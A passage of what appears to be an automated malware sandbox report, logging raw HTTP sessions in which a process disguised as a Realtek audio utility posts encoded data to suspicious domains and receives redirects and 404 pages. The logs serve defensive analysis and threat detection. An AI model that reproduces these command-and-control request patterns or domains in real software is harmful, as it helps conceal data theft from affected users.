                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 45 46 79 59 6c 59 45 56 4d 55 73 32 6d 6c 2f 72 4b 53 6c 43 6f 7a 68 57 6f 51 50 63 58 6c 55 59 58 41 67 44 76 5a 77 47 31 58 71 69 37 56 35 51 57 36 56 66 4e 64 71 51 4b 78 34 4c 67 42 5a 6f 71 41 5a 79 6c 50 52 49 59 64 6e 74 75 6c 67 64 58 6d 38 6a 38 6e 76 57 2f 57 68 47 4e 6c 49 2b 4f 6b 37 44 6c 36 67 30 42 57 73 6d 6c 6d 56 58 64 2b 44 78 79 62 42 4d 55 58 68 69 51 49 6e 37 69 46 73 78 6b 32 2b 55 78 4e 6d 66 61 79 72 35 51 67 79 41 65 59 42 46 4f 45 57 4f 56 59 63 41 6e 35 5a 68 46 77 63 31 49 34 46 49 77 6f 79 67 6e 6a 65 53 38 7a 59 49 62 30 32 38 64 64 57 61 36 30 57 35 77 36 66 66 63 67 70 50 59 6a 72 61 4f 73 78 49 54 46 6b 6a 61 31 51 78 47 59 77 39 42 34 53 78 7a 4f 4b 63 44 4d 74 6e 65 51 5a 6f 42 47 4e 66 41 2f 69 61 74 4d 42 33 76 55 39 43 34 33 35 54 53 49 52 38 6c 6d 39 77 51 43 79 77 31 76 6a 55 46 6c 56 43 5a 78 6e 65 32 5a 2b 52 4e [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXEFyYlYEVMUs2ml/rKSlCozhWoQPcXlUYXAgDvZwG1Xqi7V5QW6VfNdqQKx4LgBZoqAZylPRIYdntulgdXm8j8nvW/WhGNlI+Ok7Dl6g0BWsmlmVXd+DxybBMUXhiQIn7iFsxk2+UxNmfayr5QgyAeYBFOEWOVYcAn5ZhFwc1I4FIwoygnjeS8zYIb028ddWa60W5w6ffcgpPYjraOsxITFkja1QxGYw9B4SxzOKcDMtneQZoBGNfA/iatMB3vU9C435TSIR8lm9wQCyw1vjUFlVCZxne2Z+RNbpCyvl6jG/GEJxOGftDl0LnfAooK3vVp426Z7Gi0DMMMhS2cX7gyGuJt/X0WO5aynlwWqI4hNfc2E1+9u9JT6PaLV6E/pOHZ/8qnXmBf7Oc5rS1lflPjuG2EXyZiSux2lc+M4uCDZZ/R3IUD4rjo5nkGgOzN5b6Qy/xN//dKdOwbivlJibFldAj9Xb10oJ605zARcNRk6XezzuwxOJTJ465YUJuD1Hq0PycWd5j6H8+IWlbMiC93VmCTTb9RT0R/YR9CVieNIhgA5tUJVo38uTAH7f9mJaUXQw1UvQbzkaL9xFmBsfphrL0W2dgdJkM6iZKp8WJ3A4zicNS1MiBFYwXwrSW35U3V8sbdI+9vxRIlZL+vfPr/t0yW0lD2BjvbnuE2qlEIUpUQnXCNbGicMSHy4ZAx2hufNAhtW0a38k5JJKSNj820cVe2XFoirVsv1cphfMccnq3PYO43Tyg5bqyIR5wn2QSN03
                                                                                                  Dec 3, 2024 09:48:42.749802113 CET2520OUTData Raw: 6f 78 43 68 66 77 50 50 69 67 71 6e 71 73 47 39 6b 59 71 77 59 42 59 62 6f 57 55 39 42 56 4d 6e 6c 37 73 4f 59 55 31 39 42 44 38 36 65 50 6d 49 71 48 32 6c 6e 75 44 77 57 70 37 6e 52 6a 6f 48 76 4b 5a 69 6d 57 53 51 30 7a 37 58 31 66 48 6a 6f 41
                                                                                                  Data Ascii: oxChfwPPigqnqsG9kYqwYBYboWU9BVMnl7sOYU19BD86ePmIqH2lnuDwWp7nRjoHvKZimWSQ0z7X1fHjoAEjQ+bhTttwl4JVMY2FmMz4VEN3E0VAv8IRoxfCQ7gIWOup7lZGNpH4Jgejw3t43uEsBOO/dqFthW1903mQUJZo0mYwnL+VmVvTR1iFR20J9TFftX+LHT8vt6/1C/vaUStzcVZ6iBJQqYbQU+ZnlaJXQh6kOVlS9GR


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.11.30498803.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:45.384803057 CET413OUTGET /rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:48:45.495043039 CET405INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 03 Dec 2024 08:48:45 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 265
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 61 6f 6e 6c 35 78 3d 33 4f 68 7a 49 50 51 44 70 45 2f 57 79 4f 71 37 43 35 30 71 79 76 6a 33 64 63 38 50 69 59 4a 77 46 48 43 38 56 68 47 67 59 57 6c 42 4e 43 51 4d 52 62 41 30 34 6b 6b 58 68 63 69 62 4f 64 47 61 61 59 51 55 45 33 68 2f 64 58 4d 38 49 37 56 47 4e 33 72 6c 70 37 5a 33 4a 77 47 48 43 75 55 35 66 73 31 67 50 77 39 37 34 71 34 72 30 46 37 79 45 4a 42 62 31 75 38 3d 26 77 59 48 6b 3d 4d 5f 42 2d 67 68 63 32 48 71 6f 57 68 6d 65 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.11.3049881129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:50.982342958 CET681OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 45 78 6f 6e 6a 4a 45 4f 37 62 54 49 76 67 72 6f 38 49 73 4a 6f 70 65 63 65 6c 39 4c 59 6c 4c 79 77 63 59 42 2f 69 4f 47 71 43 34 4e 50 6b 44 4f 2b 59 66 68 7a 73 38 33 4f 35 42 4c 53 62 49 49 4a 71 78 39 4b 5a 4b 47 4e 32 31 79 45 32 31 41 51 35 72 6a 66 75 55 63 47 46 52 51 47 68 68 32 4a 56 39 77 5a 2b 4f 52 32 49 6b 65 71 68 49 7a 47 67 32 30 6f 47 56 73 76 48 56 52 42 42 49 42 6a 69 56 4a 57 52 55 71 37 79 33 48 58 30 6c 49 58 42 6f 49 4c 74 7a 68 36 6b 42 32 37 32 77 38 61 61 36 44 7a 47 34 33 62 75 30 56 49 50 36 5a 6f 6b 46 4a 4b 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoILtzh6kB272w8aa6DzG43bu0VIP6ZokFJKQ==
                                                                                                  Dec 3, 2024 09:48:51.326978922 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:48:51 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:48:51.327056885 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:48:51.327111006 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:48:51.327125072 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:48:51.327136993 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:48:51.327152014 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:48:51.327164888 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:48:51.327291965 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:48:51.327337027 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:48:51.328808069 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                  Dec 3, 2024 09:48:51.670322895 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.11.3049882129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:48:53.853912115 CET701OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 76 79 33 35 6b 42 2b 67 6d 47 35 79 34 4e 42 45 44 50 78 34 65 76 7a 73 77 56 4f 38 35 4c 53 62 73 49 4a 76 56 39 4b 71 69 4a 4d 6d 31 4b 63 47 31 43 64 5a 72 6a 66 75 55 63 47 46 46 32 47 68 35 32 4a 6c 4e 77 5a 63 6d 65 37 6f 6b 5a 39 52 49 7a 43 67 32 77 6f 47 56 65 76 47 59 2b 42 44 41 42 6a 67 64 4a 58 45 67 70 78 79 32 43 61 55 6b 39 59 42 45 45 46 2b 72 75 72 47 49 73 35 32 55 6c 53 74 58 5a 75 46 4d 31 49 4f 49 34 55 4f 58 78 71 6d 45 53 58 56 7a 5a 34 46 39 2b 72 72 59 61 39 67 4d 36 4e 41 6f 6c 4b 4a 45 3d
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXvy35kB+gmG5y4NBEDPx4evzswVO85LSbsIJvV9KqiJMm1KcG1CdZrjfuUcGFF2Gh52JlNwZcme7okZ9RIzCg2woGVevGY+BDABjgdJXEgpxy2CaUk9YBEEF+rurGIs52UlStXZuFM1IOI4UOXxqmESXVzZ4F9+rrYa9gM6NAolKJE=
                                                                                                  Dec 3, 2024 09:48:54.198331118 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:48:54 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:48:54.198371887 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:48:54.198434114 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:48:54.198441982 CET246INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:48:54.198486090 CET1289INData Raw: 41 42 61 68 6b 48 67 32 6a 73 50 5a 6d 48 6a 54 50 58 42 6f 6b 2b 39 77 43 77 44 62 61 57 79 37 49 6d 4f 6b 53 46 37 48 73 68 6c 6a 4a 54 48 34 6c 66 62 52 63 4a 41 6b 32 2b 6b 38 52 4f 56 74 6e 76 66 67 4d 42 36 48 35 58 70 73 37 76 36 70 4f 43
